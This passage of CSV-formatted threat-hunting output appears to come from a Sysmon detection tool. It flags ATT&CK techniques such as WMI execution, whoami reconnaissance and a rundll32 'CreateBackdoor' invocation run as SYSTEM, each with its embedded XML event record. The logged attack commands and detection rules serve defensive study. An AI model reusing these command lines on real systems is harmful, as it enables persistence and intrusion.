</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:16.990</Data>
<Data Name=""ProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
<Data Name=""ProcessId"">4448</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /c start ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
<Data Name=""LogonId"">0x7cef82</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
<Data Name=""ParentProcessId"">4612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-01-14T20:48:17.044002Z"">
</TimeCreated>
<EventRecordID>344</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1840"" ThreadID=""8032"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-01-14 20:48:16.990</Data>
<Data Name=""ProcessGuid"">747F3D96-2910-5E1E-0000-001053F57C00</Data>
<Data Name=""ProcessId"">4448</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /c start ms-browser://</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-2910-5E1E-0000-002082EF7C00</Data>
<Data Name=""LogonId"">0x7cef82</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-2910-5E1E-0000-0010F5F07C00</Data>
<Data Name=""ParentProcessId"">4612</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557970296.456891,2019-05-16T05:31:36.456891+04:00,,Threat,Low,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C ipconfig ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-16T01:31:36.454892Z"">
</TimeCreated>
<EventRecordID>17985</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1792"" ThreadID=""2232"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-16 01:31:36.443</Data>
<Data Name=""ProcessGuid"">DFAE8213-BD78-5CDC-0000-001091041300</Data>
<Data Name=""ProcessId"">3136</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.3.9600.16384 (winblue_rtm.130821-1623)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /C ipconfig</Data>
<Data Name=""CurrentDirectory"">C:\Users\administrator\</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""LogonGuid"">DFAE8213-BD78-5CDC-0000-002005FE1200</Data>
<Data Name=""LogonId"">0x12fe05</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3</Data>
<Data Name=""ParentProcessGuid"">DFAE8213-BD78-5CDC-0000-0010C7FE1200</Data>
<Data Name=""ParentProcessId"">3948</Data>
<Data Name=""ParentImage"">C:\Windows\System32\winrshost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\WinrsHost.exe -Embedding</Data>
</EventData>
</Event>",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /all) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-29T20:59:22.144046Z"">
</TimeCreated>
<EventRecordID>8050</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1896"" ThreadID=""1820"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-29 20:59:22.128</Data>
<Data Name=""ProcessGuid"">365ABB72-65AA-5CC7-0000-00104D882400</Data>
<Data Name=""ProcessId"">2116</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /all</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Documents\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
<Data Name=""LogonId"">0x10896</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
<Data Name=""ParentProcessId"">3376</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /all ) contain suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-29T20:59:22.144046Z"">
</TimeCreated>
<EventRecordID>8050</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1896"" ThreadID=""1820"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-04-29 20:59:22.128</Data>
<Data Name=""ProcessGuid"">365ABB72-65AA-5CC7-0000-00104D882400</Data>
<Data Name=""ProcessId"">2116</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /all</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Documents\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-5B3A-5CC7-0000-002096080100</Data>
<Data Name=""LogonId"">0x10896</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-65A9-5CC7-0000-00104E5C2400</Data>
<Data Name=""ParentProcessId"">3376</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -s -NoLogo -NoProfile</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Command run remotely Using WMI,1603490254.745175,2020-10-24T01:57:34.745175+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:57:29.217562Z"">
</TimeCreated>
<EventRecordID>423991</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:57:29.192</Data>
<Data Name=""ProcessGuid"">747F3D96-51C9-5F93-0000-001010175B00</Data>
<Data Name=""ProcessId"">8796</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">WMI Provider Host</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Wmiprvse.exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\NETWORK SERVICE</Data>
<Data Name=""LogonGuid"">747F3D96-C50A-5F93-0000-0020E4030000</Data>
<Data Name=""LogonId"">0x3e4</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B</Data>
<Data Name=""ParentProcessGuid"">00000000-0000-0000-0000-000000000000</Data>
<Data Name=""ParentProcessId"">836</Data>
<Data Name=""ParentImage"">?</Data>
<Data Name=""ParentCommandLine"">?</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.548464Z"">
</TimeCreated>
<EventRecordID>243565</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010729F2000</Data>
<Data Name=""ProcessId"">3536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.548464Z"">
</TimeCreated>
<EventRecordID>243565</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010729F2000</Data>
<Data Name=""ProcessId"">3536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1597237560.737148,2020-08-12T17:06:00.737148+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c reg query &quot;HKLM\Software\WOW6432Node\Npcap&quot; /ve 2&gt;nul | find &quot;REG_SZ&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-12T13:05:38.260138Z"">
</TimeCreated>
<EventRecordID>342409</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3344"" ThreadID=""4176"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-08-12 13:05:38.149</Data>
<Data Name=""ProcessGuid"">747F3D96-E922-5F33-0000-00107A2B0B00</Data>
<Data Name=""ProcessId"">6952</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c reg query &quot;HKLM\Software\WOW6432Node\Npcap&quot; /ve 2&gt;nul | find &quot;REG_SZ&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-E909-5F33-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-E90A-5F33-0000-0010863C0100</Data>
<Data Name=""ParentProcessId"">1740</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\SYSTEM32\cmd.exe /c &quot;&quot;C:\Program Files\Npcap\CheckStatus.bat&quot;&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564825609.436856,2019-08-03T13:46:49.436856+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot;\system32\cleanmgr.exe /autoclean /d C: ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-03T09:46:49.402550Z"">
</TimeCreated>
<EventRecordID>5134</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2780"" ThreadID=""3676"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-03 09:46:49.331</Data>
<Data Name=""ProcessGuid"">747F3D96-5809-5D45-0000-00100B233F00</Data>
<Data Name=""ProcessId"">1380</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot;\system32\cleanmgr.exe /autoclean /d C:</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-56A3-5D45-0000-0020B3D31800</Data>
<Data Name=""LogonId"">0x18d3b3</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4EA-5D45-0000-00105CD60000</Data>
<Data Name=""ParentProcessId"">1072</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.548464Z"">
</TimeCreated>
<EventRecordID>243565</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.544</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010729F2000</Data>
<Data Name=""ProcessId"">3536</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
